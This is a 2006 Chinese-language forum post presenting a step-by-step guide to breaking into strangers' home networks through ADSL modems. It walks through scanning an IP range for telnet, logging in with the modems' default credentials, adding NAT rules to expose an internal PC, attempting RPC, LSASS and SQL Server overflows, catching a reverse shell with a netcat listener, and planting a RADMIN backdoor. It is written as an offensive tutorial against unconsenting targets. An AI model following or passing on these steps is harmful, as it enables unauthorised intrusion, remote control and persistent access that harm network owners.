史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 網路軟硬體架設技術文件
忘記密碼?
註冊帳號 論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2006-06-12, 04:04 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 軟體 - 教你穿透ADSL路由入侵內網

教你穿透ADSL路由入侵內網

也許看爛了網上已有的一般黑客攻擊手段,對一些陳舊的入侵手法早已厭煩,近來我對ADSL MODEM的 路由功能產生了濃厚的興趣,經過一番努力,我終於找到了穿透ADSL路由入侵內網的方法,在這裡和各位一起分享我的心得
  一.掃瞄
  現在很多ADSL MODEM都是通過 80 23 21 三個連接阜來管理,但80 21連接阜有很多服務器都有打開,沒怎麼特徵性,於是我選擇了23連接阜,打開我的至愛:SUPPERSCAN,填上我所在地區的IP段,(跨多幾段都沒關係,反正SUPPERSCAN的速度就是快)眨眼間,結果出來了,開23的主機還真不小啊:)我挑了幾台出來,在瀏覽器那裡輸入IP:218.xxx.xxx.xxx,OK。登入交談視窗出來了,輸入USER:ADSL pass:adsl1234(因為我這裡的adsl modem一般是華碩的,預設是adsl adsl1234)bingle 一矢中的,現在我就是上帝。

  二.映射
 入侵已經成功了一半,要進一步入侵內網,我門要進行連接阜映射,但是我連內網的拓撲,都不知道(更不用說內網主機的連接阜開放情況了)又怎麼映射呢?在此,我選擇了猜測。一般來說,MODEM的內網IP預設是192.168.1.1,而大多數就把自己主機的IP設成192.168.1.2。因此我們只要試試把192。168。1。2的連接阜映射出來就行了(但如果使用了dhcp就麻煩了)但是192。168。1。2到底開放了什麼連接阜,我們根本就不知道啊,呵呵,既然不知道,那麼我就把他整台主機透明地映射到外網,具體做法如下:進入NAT選項---新增NAT規則---BAMID---填入主機IP:192。168。1。2,到此192。168。1。2已經透明地映射到192。168。1。1上了,我們訪問ADSL MODEM就等於訪問主機192。168。1。2了

  三。檢測漏洞
  現在我們再請出SUPPERSCAN對218。xxx.xxx.xxx進行掃瞄,呵,看到沒有?掃瞄結果已經不同了,開放的連接阜是139 1433等,剛才只是開放了80 23 21 而已(也就是說我們的映射已經成功了)該是X-SCAN出手了,用它來掃弱口令最好不過了,但掃瞄的結果令人失望,一個弱口令也沒有,看來管理員還不算低B啊

  四。溢出
 既然沒有弱口令,也沒開80,那只好從逸出方面著手了,但沒開80 21 也就webdav .sevr-u的溢出沒戲了,很自然,我嚮導了RPC溢出,但實踐證明RPC溢出也是不行的,LSASS溢出也不行

  五。募然回首,那人卻在,燈火闌珊處
開來這管理員還是比較負責的,該打的修正檔都打上了,這時侯,我的目光轉移到1433上了(嘿,不知道他打了SQL修正檔沒有?,心動不如行動,現在只好死馬當活馬醫了,於是
nc -v -l 99
sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
bingle 成功地得到一個shell了

  六。設置後門
  到這裡,我們的入侵已經成功了,餘下的是掃尾留後門,至於後門,我一般都是用FTP上傳RADMIN上去的,呵呵,這裡不詳談了,相信各位都知道。
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1630 篇, 收花: 3204 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 08:38 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2020, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1